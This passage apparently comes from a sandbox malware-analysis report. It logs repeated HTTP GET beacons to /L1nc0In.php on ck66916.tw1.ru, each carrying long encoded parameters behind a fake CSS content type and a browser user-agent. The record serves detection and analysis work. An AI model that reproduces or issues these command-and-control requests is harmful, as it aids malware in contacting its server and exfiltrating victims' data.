NJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYp